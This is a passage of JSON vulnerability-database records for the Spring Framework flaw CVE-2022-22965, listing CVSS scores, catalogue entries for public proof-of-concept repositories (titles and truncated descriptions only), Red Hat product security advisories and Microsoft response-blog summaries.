"confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:32", "id": "9538B7BA-979F-523C-9913-4FE62CF77C5C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:59", "description": "Simple Spring4Shell POC \r\n-----------------------\r\n\r\n* Check if ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T18:09:58", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-04T14:13:42", "id": "397046C4-338E-5CCC-AD0A-687CA3551B7C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-17T01:54:15", "description": "# Spring-Core-RCE Spring Framework \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff08CVE-2022-22965\uff09\nSpri...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T09:13:54", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-16T21:52:35", "id": "A0648F78-7165-5CA8-82DC-B34350E2DDC6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-06-14T15:55:44", "description": "# Minimal CVE-2022-22965 example\n\nAt the time of writing, spring...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-02T19:47:47", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-10-15T13:39:43", "id": "FF4B608A-EAF3-5EFC-921B-248F48F14720", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-20T23:37:56", "description": "# Nmap-spring4shell\nLog4shell-nmap is an NSE script for detectin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T01:27:28", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Framework", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2023-09-20T21:20:47", "id": "CFF7A226-3523-52E0-8A6C-0D0E6A7BEBD6", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-04T23:38:22", "description": "CVE-2022-22965 - vulnerable app and PoC\n------------------------...", "cvss3": {}, "published": "2022-03-31T08:06:46", "type": "githubexploit", "title": "Exploit for Code Injection in Oracle Fusion Middleware", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22965"], "modified": "2022-04-04T22:11:49", "id": "701F758F-BBA0-582C-AE23-AA3C515F6A9F", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-01T02:33:23", "description": "# springhound\nCreated after the release of CVE-2022-22965 a...", "cvss3": {}, "published": "2022-04-01T00:34:29", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-04-01T00:47:30", "id": "D30073F4-9BB7-54D9-A5F6-DCCA5A005D4D", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:13:48", "description": "# spring-shell-vuln\n\n## Spring4Shell: Spring core RCE vulnerabil...", "cvss3": {}, "published": "2022-04-05T09:35:41", "type": "githubexploit", "title": "Exploit for CVE-2022-22965", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22965"], "modified": "2022-04-05T09:35:41", "id": "552E4AC2-693D-5E49-B56E-E5473F4241E9", "href": "", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}, "privateArea": 1}], "redhat": [{"lastseen": "2023-08-16T15:27:36", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.8.6 serves as a replacement for Red Hat AMQ Broker 7.8.5, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:11", "type": "redhat", "title": "(RHSA-2022:1626) Low: Red Hat AMQ Broker 7.8.6 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:24", "id": "RHSA-2022:1626", "href": "https://access.redhat.com/errata/RHSA-2022:1626", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms. \n\nThis release of Red Hat AMQ Broker 7.9.4 serves as a replacement for Red Hat AMQ Broker 7.9.3, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-27T09:45:16", "type": "redhat", "title": "(RHSA-2022:1627) Low: Red Hat AMQ Broker 7.9.4 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-27T09:45:46", "id": "RHSA-2022:1627", "href": "https://access.redhat.com/errata/RHSA-2022:1627", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "Red Hat Decision Manager is an open source decision management platform that combines business rules management, complex event processing, Decision Model & Notation (DMN) execution, and business optimization for solving planning problems. It automates business decisions and makes that logic available to the entire business. \n\nThis asynchronous security patch is an update to Red Hat Decision Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:29:33", "type": "redhat", "title": "(RHSA-2022:1379) Low: Red Hat Decision Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:29:56", "id": "RHSA-2022:1379", "href": "https://access.redhat.com/errata/RHSA-2022:1379", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "A micro version update (from 1.6.4 to 1.6.5) is now available for Red Hat Camel K that includes CVE fixes in the base images, which are documented in the Release Notes document linked in the References section.\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-12T18:28:41", "type": "redhat", "title": "(RHSA-2022:1333) Low: Red Hat Integration Camel-K 1.6.5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-12T18:29:00", "id": "RHSA-2022:1333", "href": "https://access.redhat.com/errata/RHSA-2022:1333", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "Red Hat Process Automation Manager is an open source business process management suite that combines process management and decision service management and enables business and IT users to create, manage, validate, and deploy process applications and decision services.\n\nThis asynchronous security patch is an update to Red Hat Process Automation Manager 7.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T17:05:38", "type": "redhat", "title": "(RHSA-2022:1378) Low: Red Hat Process Automation Manager 7.12.1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-14T17:06:00", "id": "RHSA-2022:1378", "href": "https://access.redhat.com/errata/RHSA-2022:1378", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "Red Hat Integration - Camel Extensions for Quarkus 2.2.1-1 serves as a replacement for 2.2.1 and includes the following security Fix(es):\n\nSecurity Fix(es):\n\n* spring-beans: spring-framework: RCE via Data Binding on JDK 9+ (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T14:02:32", "type": "redhat", "title": "(RHSA-2022:1306) Low: Red Hat Integration Camel Extensions for Quarkus 2.2.1-1 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-11T14:02:57", "id": "RHSA-2022:1306", "href": "https://access.redhat.com/errata/RHSA-2022:1306", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T15:27:36", "description": "This release of Red Hat Fuse 7.10.2 serves as a replacement for Red Hat Fuse 7.10.1, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es):\n\n* spring-webmvc: spring-framework: RCE via Data Binding on JDK 9+ [fuse-7] (CVE-2022-22965)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T14:42:27", "type": "redhat", "title": "(RHSA-2022:1360) Low: Red Hat Fuse 7.10.2 release and security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-13T14:42:43", "id": "RHSA-2022:1360", "href": "https://access.redhat.com/errata/RHSA-2022:1360", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "msrc": [{"lastseen": "2023-06-14T15:26:47", "description": "Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:68FA6D02FA64FF61F41A7B1A8E364197", "href": "/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:26:47", "description": "\u672c\u30d6\u30ed\u30b0\u306f\u3001Microsoft\u2019s Response to CVE-2022-22965 Spring Framework \u306e\u6284\u8a33\u7248\u3067\u3059\u3002\u6700\u65b0\u306e\u60c5\u5831\u306f\u539f\u6587\u3092\u53c2\u7167\u3057\u3066\u304f\u3060\u3055\u3044\u3002 \u6982\u8981 \u6982", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "CVE-2022-22965 Spring Framework \u306b\u5bfe\u3059\u308b\u30de\u30a4\u30af\u30ed\u30bd\u30d5\u30c8\u306e\u5bfe\u5fdc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T07:00:00", "id": "MSRC:4016FF02733260CBC5200B5091666FD4", "href": "/blog/2022/04/microsofts-response-to-cve-2022-22965-spring-framework-jp/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-08T19:45:16", "description": "Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability. Threat analysis of the \u2026\n\n[ Microsoft\u2019s Response to CVE-2022-22965 Spring Framework Read More \u00bb](<https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T23:41:01", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965"], "modified": "2022-04-05T23:41:01", "id": "MSRC:A49EE2D875C0E490BD326B3CDDB7399F", "href": "https://msrc-blog.microsoft.com/2022/04/05/microsofts-response-to-cve-2022-22965-spring-framework/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-22T16:39:48", "description": "Summary Summary Microsoft used the Spring Framework RCE, Early Announcement to inform analysis of the remote code execution vulnerability, CVE-2022-22965, disclosed on 31 Mar 2022. We have not to date noted any impact to the security of our enterprise services and have not experienced any degraded service availability due to this vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T07:00:00", "type": "msrc", "title": "Microsoft\u2019s Response to CVE-2022-22965 Spring Framework", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, 